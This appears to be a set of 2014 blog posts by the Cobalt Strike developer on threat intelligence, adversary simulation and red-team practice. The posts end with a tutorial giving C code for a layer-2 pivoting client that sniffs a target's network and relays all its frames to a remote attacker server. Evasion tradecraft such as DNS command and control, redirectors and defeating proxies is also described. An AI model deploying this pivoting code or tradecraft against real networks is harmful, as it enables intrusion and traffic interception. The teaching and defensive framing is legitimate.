Audiences… or who I think I’m writing for

December 11, 2014

This is another meta-post about this blog. If you’re not a regular reader, this post is probably not for you. I’d like to share the different audiences I imagine when I write here. Conveniently, the blog’s categories map quite well to audiences.

In the Metasploit Framework category I imagine that I’m writing to members of the Metasploit Framework community. I generally document the undocumented and share things I’ve learned digging deep into the framework here. My assumption is that if I find it interesting, others probably will too.

In the red team category I write a lot about my experiences supporting different cyber defense exercises. Once in a while, I delve into experiences from when I was penetration testing. This category is a mix of techniques and ideas about how to organize a red team. Earlier this year I had the opportunity to take part in a large-scale cyber war game run by folks I hadn’t worked with before. When I arrived, I found out that a big part of how I got there was this blog. Apparently, not enough people talk about how to scale large red teams and collaborate. Who knew?

In the Cobalt Strike category I announce new releases and I write about different Cobalt Strike features. This category is meant for Cobalt Strike’s users. I see my blog as an extension of the online training. I update the online course every two years. In between, this blog is my place to capture the thought process and tradecraft that goes with each new feature. If you want to keep up with the latest of what Cobalt Strike can do or where it’s going, this blog is the place to do it. Oftentimes, questions customers ask end up as posts in this category too.

Once in a great while I make an attempt at writing reference pieces. These are my “What Penetration Testers Should Know” posts. I find these posts incredibly difficult to write. I usually stick these in the red team category. These posts have minimal marketing in them and usually appeal to a broad audience. I know when I want more traffic, I can sequester myself for a week to write one. Sadly, I don’t have many weeks where I can get away with this.

Some past posts:

I also occasionally write blog posts that document a technique and include source code. I think it’s important to continue to share code and knowledge with my peers. These posts are pretty difficult to write as well. The code I release in these contexts is usually meant as something for others to learn from, so I have to take my time to make it clear and document it.

Some past examples of these posts include:

And, finally, I’m starting to write blog posts on industry trends I see. I work with a lot of red teams and services firms through my Cobalt Strike product. These teams buy my product because there’s something they want to do with it. From this vantage point I see penetration testing evolving. The old way probably won’t go away, but I see new kinds of offensive services resonating well with customers. These posts are targeted at those who are championing these ideas within their organizations.

Here are a few to look at along these lines:

And, that’s pretty much it. I published my post for this week and now I’m off the hook.

When You Know Your Enemy

December 4, 2014

TL;DR This is my opinion on Threat Intelligence: Automated Defense using Threat Intelligence feeds is (probably) rebranded anti-virus. Threat Intelligence offers benefit when used to hunt for or design mitigations to defeat advanced adversaries. Blue teams that act on this knowledge have an advantage over that adversary and others that use similar tactics.

Threat Intelligence is one of those topics you either love to scoff at or embrace. In this post, I’ll share my hopes, dreams, and aspirations for the budding discipline of Threat Intelligence.

I define Threat Intelligence as actionable adversary-specific information to help you defend your network. There are several firms that sell threat intelligence. Each of these firms tracks, collects on, and produces reports and raw indicator information for multiple actors. What’s in these reports and how these companies collect their information depends on the company and the means and relationships at their disposal.

How best to get value from Threat Intelligence is up for debate, and there are many theories and products that try to answer this question. The competing ideas center on what counts as actionable information and how you should use it.

Anti-virus Reborn as… Anti-virus

One theory for Threat Intelligence is to provide a feed with IP addresses, domain names, and file hashes for known bad activity. Customers subscribe to this feed, their network defense tools ingest it, and now their network is automatically safe from any actor that the Threat Intelligence provider reports on. Many technical experts scoff at this, and not without reason. This is not far off from the anti-virus model.

The above theory is NOT why I care about Threat Intelligence. My interest is driven by my admittedly skewed offensive experiences. Let me put you into my shoes for a moment…

I build hacking tools for a living. These tools get a lot of use at different Cyber Defense Exercises. Year after year, I see repeat defenders and new defenders. For some defenders, Cobalt Strike is part of their threat model. These teams know they need to defend against Cobalt Strike capability. They also know they need to defend against the Metasploit Framework, Dark Comet, and other common tools too. These tools are known. I am quick to embrace and promote alternate capabilities for this exact reason. Diversity is good for offense.

I have to live with defenders that have access to my tools. This forces me to come up with ways for my power users and me to stay ahead of smart defenders. It’s a fun game and it forces my tools to get better.

The low hanging fruit of Threat Intelligence makes little sense to me. As an attacker, I can change my IP addresses easily enough. I stand up core infrastructure, somewhere on the internet, and I use redirectors to protect my infrastructure’s location from network defenders. Redirectors are bounce servers that sit between my infrastructure and the target’s network. I also have no problem changing my hashes or the process I use to generate my executable and DLL artifacts. Cobalt Strike has well-thought-out workflows for this.

I worry about the things that are harder to change.

Why is notepad.exe connecting to the Internet?

Each blue team will latch on to their favorite indicators. I remember one year many blue teams spoke of the notepad.exe malware. They would communicate with each other about the tendency for red team payloads to inject themselves into notepad.exe. This is a lazy indicator, originating from the Metasploit Framework and older versions of Cobalt Strike. It’s something a red operator can change, but few bother to do so. I would expect to see this type of indicator in the technical section of a Threat Intelligence report. This information would help a blue team get ahead of the red teams I worked with that year.

If you’d like to see how this is done, I recommend that you read J.J. Guy’s case study on how to use Carbon Black to investigate this type of indicator.

Several blue teams worry about Cobalt Strike and its Beacon payload. This is my capability to replicate an advanced adversary. These teams download the trial and pick apart my tool to find indicators that they can use to find Beacon. These teams know they can’t predict my IP addresses, which attack I will use, or what file I will touch disk with. There are other ways to spot or mitigate an attacker’s favorite techniques.

DNS Command and Control

One place you can bring hurt to an attacker is their command and control. If you understand how they communicate, you can design mitigations to break this, or at least spot their activity with the fixed indicators in their communication. One of my favorite stories involves DNS.

Cobalt Strike has had a robust DNS communication capability since 2013. It’s had DNS beaconing since late 2012. This year, several repeat blue teams had strategies to find or defeat DNS C2. One team took my trial and figured out that parts of my DNS communication scheme were case sensitive. They modified their DNS server to randomly change the casing of all DNS replies and break my communication scheme.

This helped them mitigate red team activity longer than other blue teams. This is another example where information about your adversary can help. If you know there’s a critical weakness in your adversary’s toolchain, use that weakness to protect your network against it. This is not much different from spoofing a mutex value or changing a registry option to inoculate a network against a piece of malware.
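To make the idea concrete, here’s a rough sketch of what “randomly change the casing” could look like. This is a hypothetical helper, not that team’s actual DNS server change: DNS names are case-insensitive by specification, so legitimate clients won’t notice, while a C2 scheme that packs case-sensitive data into names will break.

#include <ctype.h>
#include <stdlib.h>

/* hypothetical helper: scramble the letter casing of a DNS name before it
   goes out in a reply. RFC-compliant resolvers treat names as case-insensitive,
   so normal lookups still work, while a case-sensitive C2 encoding breaks. */
void scramble_case(char *name) {
	for (; *name; name++) {
		if (isalpha((unsigned char)*name))
			*name = (rand() & 1) ? toupper((unsigned char)*name)
			                     : tolower((unsigned char)*name);
	}
}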

This story doesn’t end there though. This team fixated on DNS and they saw it as the red team’s silver bullet. Once we proved we could use DNS, we put our efforts towards defeating the proxy restrictions each team had in place. We were eventually able to defeat this team’s proxy and we had another channel to work in their network. We used outbound HTTP requests through their restrictive proxy server to control a host and pivot to others. They were still watching for us over DNS. The lesson? Even though your Threat Intelligence offers an estimate of an adversary’s capability, don’t neglect the basics, and don’t assume that’s the way they will always hit you. A good adversary will adapt.

To Seek Out New Malware in New Processes…

After a National CCDC event, a student team revealed that they would go through each process and look for WinINet artifacts to hunt Beacon. This is beautiful on so many levels. I build technologies, like Malleable C2, to allow a red operator to customize their indicators and give my payload life, even when the payload is known by those who defend against it. This blue team came up with a non-changing indicator in my payload’s behavior. Fixed malware behavior or artifacts in memory are things a Threat Intelligence company can provide a client’s hunt team. These are tools to find the adversary.

It’s (not) always about the Malware

The red teams I work with quickly judge which teams are hard and which teams are not. We adjust our tradecraft to give harder teams a better challenge. There are a few ways we’ll do this.

Sometimes I know I can’t put malware on key servers. When this happens, I’ll try to live on the systems the defenders neglect. I then use configuration backdoors and trust relationships to keep access to the servers that are well protected. When I need to, I’ll use RDP or some other built-in tool to work with the well protected server. In this way, I get what I need without alerting the blue team to my activity. Malware on a target is not a requirement for an attacker to accomplish their goal.

CrowdStrike tracks an actor they call DEEP PANDA. This actor uses very similar tradecraft. If a blue team knew my favored tradecraft and tricks in these situations, they could instrument their tools and scripts to look for my behavior.

A few points…

You may say, that’s one adversary. What about the others? There are several ways to accomplish offensive tasks and each technique has its limitations (e.g., DNS as a channel). If you mitigate or detect a tactic, you’ll likely affect or find other adversaries that use that tactic too. If an adversary comes up with something novel and uses it in the wild, Threat Intelligence is a way to find out about it, and stay ahead of advancing adversary tradecraft. Why not let the adversary’s offensive research work for you?

You may also argue that your organization is still working on the basics. They’re not ready for this. I understand. These concepts are not for every organization. If you have a mature intrusion response capability, these are ideas about how Threat Intelligence can make it better. These concepts are a complement to, not a replacement for, the other best practices in network defense.

And…

You’ll notice that I speak favorably of Threat Intelligence and its possibilities. I read the glossy marketing reports these vendors release to tease their services. The information in the good reports isn’t far off from the information blue teams use to understand and get an edge in different Cyber Defense Exercises.

In each of these stories, you’ll notice a common theme. The red team is in the network or will get in the network (Assume Compromise!). Knowledge of the red actor’s tools AND tradecraft helps the blue teams get an advantage. These teams use their adversary knowledge in one of two ways: they either design a mitigation against that tactic or they hunt for the red team’s activity. When I look at Threat Intelligence, I see the most value when it aids a thinking blue operator in this way. As a red operator, this is where I’ve seen the most challenge.

Further Reading

  • Take a look at The Pyramid of Pain by David Bianco. This post discusses indicators in terms of things you deny the adversary. If you deny the adversary an IP address, you force them to take a routine action. If you deny the adversary use of a tool, you cause them a great deal of pain. David’s post is very much in the spirit of this one. Thanks to J.J. Guy for the link.

 

My Constraint-based Product Strategy

November 26, 2014

When I work on a project, I like to define a broad problem statement. This is the project’s intended mark on the world. I don’t have enough hubris to claim a solution for all cases. To make my projects tractable, I define assumptions. These assumptions bound the problem statement and keep the work under control. I tend to live within my assumptions until I feel the project has outgrown them. When this happens, I look for an opportunity to redefine my work under a new problem statement or, at least, new assumptions.

In this blog post, I’ll take you through the problem statements and assumptions that define Armitage and Cobalt Strike. It’s fitting that I write this now, because I’m re-examining Cobalt Strike’s problem statement and assumptions.

Armitage

Armitage is a scriptable user interface for the Metasploit Framework that allows red teams to collaborate. Armitage has a broad problem statement: how do I help red teams collaborate?

Armitage lives under a set of assumptions.

First, I had to define a use case for this project. I opted to scope Armitage’s use case to exercise red teams, particularly red teams for the Collegiate Cyber Defense Competitions, which I had a lot of volunteer involvement with.

Next, I scoped Armitage to the Metasploit Framework only. I had zero intention of building the one collaboration framework to rule them all. I wanted to explore some ideas within the context of the Metasploit Framework and what it offers. This meant I would not integrate third-party hacking tools with Armitage and I would not build new hacking capability into it. These assumptions gave me suitable constraints to build and reason about Armitage.

This weekend, Armitage will celebrate its fourth birthday. I continue to maintain this project, but Armitage was successful in its original efforts a long time ago. Today, most penetration testing and red team platforms have collaboration features. Armitage is a familiar face at events where hackers have to work together with the Metasploit Framework. We now have good practices [1, 2, 3, 4] to organize red teams in cyber defense exercises.

Cobalt Strike

I used to work on a red team support contract. Stealth and evasion mattered a great deal. I ran into the limitations of available tools. I saw a need for penetration testing tools to challenge harder targets. My work on these problems became Cobalt Strike. I define Cobalt Strike’s problem set as closing the gap between penetration testing tools and so-called advanced threat capabilities. It’s in my logo even! “Advanced Threat Tactics for Penetration Testers”. 

Like Armitage, Cobalt Strike lives under a set of assumptions too.

Every feature I build into Cobalt Strike requires synergy with a stock instance of the Metasploit Framework. This assumption led to a collection of tools very focused on the Windows attack surface. Some of Cobalt Strike’s concepts would be right at home with a MacOS X target, but there’s too little opportunity for synergy with the Metasploit Framework, so I haven’t looked in this direction. My emphasis on 32-bit payloads also comes from this assumption.

Second, Cobalt Strike is made for a hypothetical internal red team for a large corporate or government enterprise. This assumption has had major influences on my product. It defines the problems I care about and the things I ignore. Let’s use browser pivoting as an example. This technology was made to meet a need for a segment of users. These users care about Internet Explorer, not Google Chrome or Firefox. Hence, browser pivoting was made for Internet Explorer.

Third, Cobalt Strike is built for a remote operations use case. This influences the problems I work on as well. I assume that my user is a remote actor. This is why I provide covert communication options and focus on ways to evade egress restrictions. Under my assumptions, if a user can’t get out, they can’t use the rest of the toolset. This assumption also limits the features I build and the workflows I support. If a tactic isn’t practical for a remote actor, I ignore it.

My last assumption relates to what Cobalt Strike does. Cobalt Strike executes targeted attacks and replicates advanced threats. That statement is marketing speak for “sends phishing emails and focuses on post-exploitation.” I wrote the last sentence tongue-in-cheek, but there’s a reality to it. My tool supports a process: set up a client-side attack, phish to get a foothold, abuse trusts for lateral movement, and conduct post-exploitation to achieve some objective/demonstrate risk. I focus on this process and work to make this tool better support it. Few engagements execute this process end-to-end, so I make sure to decouple these pieces from each other. That said, this clear definition of what Cobalt Strike does helps guide my development efforts.

Cobalt Strike has been on the market for nearly two and a half years and it’s had a lot of updates in that time. I still have work to do within Cobalt Strike’s problem set, but I feel it’s a good product for its stated use cases.

What’s next?

I’m thinking a lot about Cobalt Strike’s next iteration. At this time, I’m revisiting Cobalt Strike’s problem statement and assumptions. As I think about what’s coming next, here are a few things at the top of my mind:

First, I believe there’s a “good enough” level for hacker capability. After a point, better malware and capability will only take a red team so far. I see several needs that I categorize as features to support assessors with growing accountability and storytelling requirements. This is a sign that some security programs are maturing and these customers expect more detail from us. I think there’s a need to put equal effort into these requirements.

I also believe we’re witnessing the emergence of a service that most penetration testers and red teams will soon offer. These are assessments that assume compromise and focus on an organization’s post-compromise security posture. Particularly, the organization’s ability to detect and remediate a sophisticated intruder. I wrote about this in a previous blog post.

Finally, I believe the deprecation of Windows XP was the end of an era. There are ideas and concepts in our tools and services that date back to the beginning of this era. I think some of these things are holding us back.

I’m not ready to speak specifics on these things yet, but I’m closely examining my tradecraft, process, and tools. I’m asking the hard questions: what’s historic baggage? What makes sense for the red team and adversary simulation use cases going forward?

Adversary Simulation Becomes a Thing…

November 12, 2014

There is a growing chorus of folks talking about simulating targeted attacks from known adversaries as a valuable security service.

The argument goes like this: penetration testers are vulnerability focused and have a toolset/style that replicates a penetration tester. This style finds security problems and it helps, but it does little to prepare the customer for the targeted attacks they will experience.

Adversary simulation is different. It focuses on the customer’s ability to deal with an attack, post-compromise. These assessments look at incident response and provide a valuable “live fire” training opportunity for the analysts who hunt for and respond to incidents each day.

The organizations that buy security products and services are starting to see that compromise is inevitable. These organizations spend money on blinky boxes, people, services, and processes to deal with this situation. They need a way to know whether or not this investment is effective. Adversary simulation is a way to do this.

What is adversary simulation?

There’s no standard definition for adversary simulation, yet. It doesn’t even have an agreed upon term. I’ve heard threat emulation, purple teaming, and attack simulation used to discuss roughly the same concept. I feel like several of us are wearing blindfolds, feeling around our immediate vicinity, and we’re working to describe an elephant to each other.

From the discussions on this concept, I see a few common elements:

The goal of adversary simulation is to prepare network defense staff for the highly sophisticated targeted attacks their organization may face.

Adversary simulation assumes compromise. The access vector doesn’t matter as much as the post-compromise actions. This makes sense to me. If an adversary lives in your network for years, the 0-day used three years ago doesn’t really matter. Offensive techniques, like the Golden Ticket, turn long-term persistence on its head. An adversary may return to your network and resume complete control of your domain at any time. This is happening.

Adversary simulation is a white box activity, sometimes driven by a sequence of events or a story board. It is not the goal of an adversary simulation exercise to demonstrate a novel attack path. There are different ways to come up with this sequence of events. You could use a novel attack from a prior red team assessment or real-world intrusion. You could also host a meeting to discuss threat models and derive a plausible scenario from that.

There’s some understanding that adversary simulation involves meaningful network and host-based indicators. These are the observables a network defense team will use to detect and understand the attacker. The simulated indicators should allow the network defense team to exercise the same steps they would take if they had to respond to the real attacker. This requires creative adversary operators with an open mind about other ways to hack. These operators must learn the adversary’s tradecraft and cobble together something that resembles their process. They must pay attention to the protocols the adversary uses, the indicators in the communication, the tempo of the communication, and whether or not the actor relies on distributed infrastructure. Host-based indicators and persistence techniques matter too. The best training results will come from simulating these elements very closely.

Adversary simulation is inherently cooperative. Sometimes, the adversary operator executes the scenario with the network defense team present. Other times the operator debriefs after all of the actions are executed. In both cases, the adversary operators give up their indicators and techniques to allow the network defense team to learn from the experience and come up with ways to improve their process. This requirement places a great burden on an adversary simulation toolkit. The adversary operators need ways to execute the same scenario with new indicators or twists to measure improvement.

  • Hacking to get Caught – A Concept for Adversary Replication and Penetration Testing
  • Threat Models that Exercise your SIEM and Incident Response
  • Comprehensive Testing: Red and Blue Make Purple
  • Seeing Purple: Hybrid Security Teams for the Enterprise

Isn’t this the same as red teaming?

I see a simulated attack as different from a red team or full scope assessment. Red Team assessments exercise a mature security program in a comprehensive way. A skilled team conducts a real-world attack, stays in the network, and steals information. At the end, they reveal a (novel?) attack path and demonstrate risk. The red team’s report becomes a tool to inform decision makers about their security program and justify added resources or changes to the security program.

A useful full scope assessment requires ample time, and these assessments are expensive.

Adversary simulation does not have to be expensive or elaborate. You can spend a day running through scenarios once each quarter. You can start simple and improve your approach as time goes on. This is an activity that is accessible to security programs with different levels of budget and maturity.

How does this relate to Cyber Defense Exercises?

I participate in a lot of Cyber Defense Exercises. Some events are set up as live-fire training against a credible simulated adversary. These exercises are driven off of a narrative and the red team executes the actions the narrative requires. The narrative drives the discussion post-action. All red team activities are white box, as the red team is not the training audience. These elements make cyber defense exercises very similar to adversary simulation as I’m describing here. This is probably why the discussion perks up my ears; it’s familiar ground for me.

There are some differences though.

These exercises don’t happen in production networks. They happen in labs. This introduces a lot of artificiality. The participants don’t get to “train as they fight” because many of the tools and sensors they use at home probably do not exist in the lab. There is also no element of surprise to help the attacker. Network defense teams come to these events ready to defend. These events usually involve multiple teams, which creates an element of competition. A safe adversary simulation, conducted on a production network, does not need to suffer from these drawbacks.

Why don’t we call it “Purple Teaming”?

Purple Teaming is a discussion about how red teams and blue teams can work together. Ideas about how to do this differ. I wouldn’t refer to Adversary Simulation as Purple Teaming. You could argue that Adversary Simulation is a form of Purple Teaming. It’s not the only form though. Some forms of purple teaming have a penetration tester sit with a network defense team and dissect penetration tester tradecraft. There are other ways to hack beyond the favored tricks and tools of penetration testers.

Let’s use lateral movement as an example:

A penetration tester might use Metasploit’s PsExec to demonstrate lateral movement, help a blue team zero in on this behavior, and call it a day. A red team member might drop to a shell and use native tools to demonstrate lateral movement, help a blue team understand these options, and move on.

An adversary operator tasked to replicate the recent behavior of “a nation-state affiliated” actor might load a Golden Ticket into their session and use that trust to remotely setup a sticky keys-like backdoor on targets and control them with RDP. This is a form of lateral movement and it’s tied to an observed adversary tactic. The debrief in this case focuses on the novel tactic and potential strategies to detect and mitigate it.

Do you see the difference? A penetration tester or red team member will show something that works for them. An adversary operator will simulate a target adversary and help their customer understand and improve their posture against that adversary. Giving defenders exposure and training on tactics, techniques, and procedures beyond the typical penetration tester’s arsenal is one of the reasons adversary simulation is so important.

What are the best practices for Adversary Simulation?

Adversary Simulation is a developing area. There are several approaches and I’m sure others will emerge over time…

Traffic Generation

One way to simulate an adversary is to simulate their traffic on the wire. This is an opportunity to validate custom rules and to verify that sensors are firing. It’s a low-cost way to drill intrusion response and intrusion detection staff too. Fire off something obvious and wait to see how long it takes your staff to detect it. If they don’t detect it, you immediately know you have a problem.
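As a minimal sketch of this approach (the address, URI, and User-Agent below are placeholders, not indicators from any particular product or report), a drill could be as simple as replaying one suspicious-looking HTTP request at a lab web server and timing how long it takes your sensors to flag it:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(void) {
	struct sockaddr_in addr;
	int s = socket(AF_INET, SOCK_STREAM, 0);
	if (s < 0) {
		perror("socket");
		return 1;
	}

	/* placeholder test server inside your own lab */
	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_port   = htons(80);
	inet_pton(AF_INET, "192.0.2.10", &addr.sin_addr);

	if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
		perror("connect");
		return 1;
	}

	/* an "obviously bad" request: a URI and User-Agent your IDS rules
	   are supposed to alert on (substitute your own indicators) */
	const char *req =
		"GET /updates/check.php HTTP/1.1\r\n"
		"Host: 192.0.2.10\r\n"
		"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
		"Connection: close\r\n\r\n";

	write(s, req, strlen(req));
	close(s);
	return 0;
}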

Marcus Carey’s vSploit is an example of this approach. Keep an eye on his FireDrill.me company, as he’s expanding upon his original ideas as well.

DEF CON 19 – Metasploit vSploit Modules

Use Known Malware

Another approach is to use public malware on your customer’s network. Load up DarkComet, GhostRAT, or Bifrost and execute attacker-like actions. Of course, before you use this public malware, you have to audit it for backdoors and make sure you’re not introducing an adversary into your network. On the bright side, it’s free.

This approach is restrictive though. You’re limiting yourself to malware that you have a full toolchain for [the user interface, the C2 server, and the agent]. This is also the malware that off-the-shelf products will catch best. I like to joke that some anti-APT products catch 100% of APT, so long as you limit your definition of APT malware to Dark Comet.

This is probably a good approach with a new team, but as the network security monitoring team matures, you’ll need better capability to challenge them and keep their interest.

Use an Adversary Simulation Tool

Penetration Testing Tools are NOT adequate adversary simulation tools. Penetration Testing Tools usually have one post-exploitation agent with limited protocols and fixed communication options. If you use a penetration testing tool and give up its indicators, it’s burned after that. A lack of communication flexibility and options makes most penetration testing tools poor options for adversary simulation.

Cobalt Strike overcomes some of these problems. Cobalt Strike’s Beacon payload does bi-directional communication over named pipes (SMB), DNS TXT records, DNS A records, HTTP, and HTTPS. Beacon also gives you the flexibility to call home to multiple places and to vary the interval at which it calls home. This allows you to simulate an adversary that uses asynchronous bots and distributed infrastructure.

The above features make Beacon a better post-exploitation agent. They don’t address the adversary replication problem. One difference between a post-exploitation agent and an adversary replication tool is user-controlled indicators. Beacon’s Malleable C2 gives you this. Malleable C2 is a technology that lets you, the end user, change Beacon’s network indicators to look like something else. It takes two minutes to craft a profile that accurately mimics legitimate traffic or other malware. I took a lot of care to make this process as easy as possible.

Malleable Command and Control

Cobalt Strike isn’t the only tool with this approach either. Encripto released Maligno, a Python agent that downloads shellcode and injects it into memory. This agent allows you to customize its network indicators to provide a trail for an intrusion analyst to follow.

Malleable C2 is a good start to support adversary simulation from a red team tool, but it’s not the whole picture. Adversary Simulation requires new storytelling tools, other types of customizable indicators, and a rethink of workflows for lateral movement and post-exploitation. There’s a lot of work to do yet.

Putter Panda – Threat Replication Case Study

Will Adversary Simulation work?

I think so. I’d like to close this post with an observation, taken across various exercises:

In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary. This is part of what allows these adversaries the freedom to live and work on so many networks. An inability to find these adversaries creates a sense of complacency. If I can’t see them, maybe they’re not there?

By exercising a network defense team and providing actionable feedback with useful details, you’re giving that team a way to understand their level. The teams that take the debrief seriously will figure out how to improve and get better.

Over time, you will find that these teams, spurred by your efforts, are operating at a level that will challenge your ability to create a meaningful experience for them. I’ve provided repeat red team support to many events since 2011. Each year I see the growth of the returning teams that my friends and I provide an offensive service to. It’s rewarding work and we see the difference.

Heed my words though: the strongest network defense teams require a credible challenge to get better. Without adversary simulation tools [built or bought], you will quickly exhaust your ability to challenge these teams and keep up with their growth.

How VPN Pivoting Works (with Source Code)

October 14, 2014

A VPN pivot is a virtual network interface that gives you layer-2 access to your target’s network. Rapid7’s Metasploit Pro was the first pen testing product with this feature. Core Impact has this capability too.

In September 2012, I built a VPN pivoting feature into Cobalt Strike. I revised my implementation of this feature in September 2014. In this post, I’ll take you through how VPN pivoting works and even provide code for a simple layer-2 pivoting client and server you can play with. The layer-2 pivoting client and server don’t encrypt their traffic, so it’s not correct to refer to them as VPN pivoting. They’re close enough to VPN pivoting to benefit this discussion though.

https://github.com/rsmudge/Layer2-Pivoting-Client

The VPN Server

Let’s start with a few terms: The attacker runs VPN server software. The target runs a VPN client. The connection between the client and the server is the channel to relay layer-2 frames.

To the attacker, the target’s network is available through a virtual network interface. This interface works like a physical network interface. When one of your programs tries to interact with the target network, the operating system makes the frames it would drop onto the wire available to the VPN server software. The VPN server consumes these frames and relays them over the data channel to the VPN client. The VPN client receives these frames and dumps them onto the target’s network.

Here’s what the process looks like:

[Diagram: the VPN server relays frames between its TAP interface and the VPN client on the target’s network]

The TAP driver makes this possible. According to its documentation, the TUN/TAP driver provides packet reception and transmission for user space programs. The TAP driver allows us to create a (virtual) network interface that we may interact with from our VPN server software.

Here’s the code to create a TAP [adapted from the TUN/TAP documentation]:

#include <fcntl.h>      /* open, O_RDWR */
#include <string.h>     /* memset, strncpy, strcpy */
#include <sys/ioctl.h>  /* ioctl */
#include <unistd.h>     /* close */
#include <linux/if.h>
#include <linux/if_tun.h>

int tun_alloc(char *dev) {
	struct ifreq ifr;
	int fd, err;

	/* open the clone device; fall back to the legacy method from the
	   TUN/TAP documentation if it isn't available */
	if( (fd = open("/dev/net/tun", O_RDWR)) < 0 )
		return tun_alloc_old(dev);

	memset(&ifr, 0, sizeof(ifr));
	ifr.ifr_flags = IFF_TAP | IFF_NO_PI;  /* TAP device, no packet information header */

	if( *dev )
		strncpy(ifr.ifr_name, dev, IFNAMSIZ);

	/* create the interface */
	if( (err = ioctl(fd, TUNSETIFF, (void *) &ifr)) < 0 ) {
		close(fd);
		return err;
	}

	/* hand back the name the kernel actually assigned */
	strcpy(dev, ifr.ifr_name);
	return fd;
}

This function allocates a new TAP. The dev parameter is the name of our interface. This is the name we will use with ifconfig and other programs to configure it. The number it returns is a file descriptor to read from or write to the TAP.
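Here’s a quick usage sketch (my example, not from the TUN/TAP documentation): pass in the name you’d like, then use whatever name the kernel hands back when you configure the interface.

char dev[IFNAMSIZ];
int tap_fd;

strcpy(dev, "tap0");        /* requested name; pass "" to let the kernel choose */
tap_fd = tun_alloc(dev);    /* on success, dev holds the actual interface name */
if (tap_fd < 0) {
	perror("tun_alloc");    /* could not create the TAP interface */
}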

To read a frame from a TAP:

int totalread = read(tap_fd, buffer, maxlength);

To write a frame to a TAP:

write(tap_fd, buffer, length);

These functions are the raw ingredients to build a VPN server. To demonstrate tunneling layer-2 frames over a TCP connection, we’ll take advantage of simpletun.c by Davide Brini.

simpletun.c is an example of using a network TAP. It’s ~300 lines of code that demonstrates how to send and receive frames over a TCP connection. This GPL(!) example accompanies Brini’s wonderful Tun/Tap Interface Tutorial. I recommend that you read it.

When simpletun.c sends a frame, it prefixes the frame with an unsigned short in big endian order. This 2-byte number, N, is the length of the frame in bytes. The next N bytes are the frame itself. simpletun.c expects to receive frames the same way.
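Here’s a sketch of that framing over a blocking TCP socket. The helper names are mine, not simpletun.c’s, but the wire format matches the description above: a 2-byte big endian length followed by the frame.

#include <arpa/inet.h>   /* htons, ntohs */
#include <unistd.h>      /* read, write */

/* send one frame: 2-byte length in big endian order, then the frame itself */
int write_frame(int sock, unsigned char *frame, unsigned short length) {
	unsigned short plength = htons(length);
	if (write(sock, &plength, sizeof(plength)) != sizeof(plength))
		return -1;
	return (write(sock, frame, length) == length) ? 0 : -1;
}

/* read exactly n bytes; TCP is a stream, so a single read may come up short */
static int read_n(int sock, unsigned char *buffer, int n) {
	int left = n, nread;
	while (left > 0) {
		if ((nread = read(sock, buffer + (n - left), left)) <= 0)
			return -1;
		left -= nread;
	}
	return n;
}

/* receive one frame into buffer; returns the frame length or -1 on error */
int read_frame(int sock, unsigned char *buffer, int maxlength) {
	unsigned short plength;
	int length;

	if (read_n(sock, (unsigned char *)&plength, sizeof(plength)) < 0)
		return -1;
	length = ntohs(plength);
	if (length > maxlength)
		return -1;
	return read_n(sock, buffer, length);
}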

To build simpletun:

gcc simpletun.c -o simpletun

Note: simpletun.c allocates a small buffer to hold frame data. Change BUFSIZE on line 42 to a higher value, like 8192. If you don’t do this, simpletun.c will eventually crash. You don’t want that.

To start simpletun as a server:

./simpletun -i [interface] -s -p [port] -a

The VPN Client

Now that we understand the VPN server, let’s discuss the VPN pivoting client. Cobalt Strike’s VPN pivoting client sniffs traffic on the target’s network. When it sees frames, it relays them to the VPN pivoting server, which writes them to the TAP interface. This causes the server’s operating system to process the frames as if they were read off of the wire.

[Diagram: the VPN client sniffs frames on the target’s network and relays them to the VPN server]

Let’s build a layer-2 pivoting client that implements similar logic. To do this, we will use the Windows Packet Capture API. WinPcap is the Windows implementation of libpcap and Riverbed Technology maintains it.

First, we need to open up the target network device that we will pivot onto. We also need to put this device into promiscuous mode. Here’s the code to do that:

pcap_t * raw_start(char * localip, char * filterip) {
	pcap_t * adhandle   = NULL;
	pcap_if_t * d       = NULL;
	pcap_if_t * alldevs = NULL;
	char errbuf[PCAP_ERRBUF_SIZE];

	/* find our interface */
	d = find_interface(&alldevs, localip);

	/* Open the device */
	adhandle = (pcap_t *)pcap_open(d->name, 65536, PCAP_OPENFLAG_PROMISCUOUS | PCAP_OPENFLAG_NOCAPTURE_LOCAL, 1, NULL, errbuf);
	if (adhandle == NULL) {
		printf("\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
		return NULL;
	}

	/* filter out the specified host */
	raw_filter_internal(adhandle, d, filterip, NULL);

	/* ok, now we can free our list of interfaces */
	pcap_freealldevs(alldevs);

	return adhandle;
}

Next, we need to connect to the layer-2 pivoting server and start a loop that reads frames and sends them to our server. I do this in raw.c. Here’s the code to ask WinPcap to call a function when a frame is read:

void raw_loop(pcap_t * adhandle, void (*packet_handler)(u_char *, const struct pcap_pkthdr *, const u_char *)) {
	pcap_loop(adhandle, 0, packet_handler, NULL);
}

The packet_handler function is my callback to respond to each frame read by WinPcap. It writes frames to our layer-2 pivoting server. I define this function in tunnel.c.

void packet_handler(u_char * param, const struct pcap_pkthdr * header, const u_char * pkt_data) {
	/* send the raw frame to our server */
	client_send_frame(server, (void *)pkt_data, header->len);
}

I define client_send_frame in client.c. This function writes the frame’s length and data to our layer-2 pivoting server connection. If you want to implement a new channel or add encryption to make this a true VPN client, client.c is the place to explore this.

We now know how to read frames and send them to the layer-2 pivoting server.

Next, we need logic to read frames from the server and inject these onto the target network. In tunnel.c, I create a thread that calls client_recv_frame in a loop. The client_recv_frame function reads a frame from our connection to the layer-2 server. The pcap_sendpacket function injects a frame onto the wire.

DWORD WINAPI ThreadProc(LPVOID param) {
	char * buffer = malloc(sizeof(char) * 65536);
	int len, result;

	while (TRUE) {
		/* read one frame from our connection to the layer-2 server */
		len = client_recv_frame(server, buffer, 65536);

		/* inject the frame we received onto the wire directly */
		result = pcap_sendpacket(sniffer, (u_char *)buffer, len);
		if (result == -1) {
			printf("Send packet failed: %d\n", len);
		}
	}

	return 0;
}

This logic is the guts of our layer-2 pivoting client. The project is ~315 lines of code and this includes headers. Half of this code is in client.c which is an abstraction of the Windows Socket API. I hope you find it navigable.

To run the layer-2 pivoting client:

client.exe [server ip] [server port] [local ip]

